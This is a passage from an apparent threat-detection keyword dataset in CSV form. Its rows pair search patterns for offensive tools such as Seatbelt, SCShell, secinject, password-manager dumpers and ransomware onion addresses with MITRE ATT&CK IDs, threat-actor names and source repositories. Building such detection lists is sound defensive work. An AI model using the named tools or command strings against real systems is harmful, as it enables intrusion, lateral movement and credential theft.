T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58251" "*scshellbof.o*",".{0,1000}scshellbof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58252" 
"*scshellbofx64*",".{0,1000}scshellbofx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58253" "*scumjr*dirtycow-vdso*",".{0,1000}scumjr.{0,1000}dirtycow\-vdso.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","58254" "*sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd.onion*",".{0,1000}sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","58255" "*sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion*",".{0,1000}sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58256" "*Search cached MSI files in C:/Windows/Installer/*",".{0,1000}Search\scached\sMSI\sfiles\sin\sC\:\/Windows\/Installer\/.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","58257" "*Search your passwords as normal user*",".{0,1000}Search\syour\spasswords\sas\snormal\suser.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 
","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58258" "*search_for_secrets(*",".{0,1000}search_for_secrets\(.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58259" "*Search-cpassword*",".{0,1000}Search\-cpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58263" "*Searching for accounts that only support RC4_HMAC*",".{0,1000}Searching\sfor\saccounts\sthat\sonly\ssupport\sRC4_HMAC.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58264" "*Searching for master credentials (2/2)*",".{0,1000}Searching\sfor\smaster\scredentials\s\(2\/2\).{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials 
and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#content","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","58265" "*SearchOutlook.exe*",".{0,1000}SearchOutlook\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58266" "*searchsploit -m *",".{0,1000}searchsploit\s\-m\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58267" "*searchsploit -x *",".{0,1000}searchsploit\s\-x\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58268" 
"*searchsploit_rc*",".{0,1000}searchsploit_rc.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","58269" "*seatbelt -*",".{0,1000}seatbelt\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 
- T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58270" "*seatbelt all*",".{0,1000}seatbelt\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58271" "*Seatbelt* -group=all*",".{0,1000}Seatbelt.{0,1000}\s\-group\=all.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58272" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","58273" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58274" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58275" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58276" "*Seatbelt.Commands.Windows.*",".{0,1000}Seatbelt\.Commands\.Windows\..{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58277" "*SeatBelt.exe system*",".{0,1000}SeatBelt\.exe\ssystem.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58278" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","58279" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety 
of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58280" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58281" "*seatbelt/hostnames.txt*",".{0,1000}seatbelt\/hostnames\.txt.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58282" 
"*SeatbeltNet*.exe*",".{0,1000}SeatbeltNet.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58283" "*SecDbg/Prince-Ransomware*",".{0,1000}SecDbg\/Prince\-Ransomware.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","58284" "*sec-inject *",".{0,1000}sec\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 
BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","0","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58285" "*secinject.cna*",".{0,1000}secinject\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY 
- Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58286" "*secinject.git*",".{0,1000}secinject\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
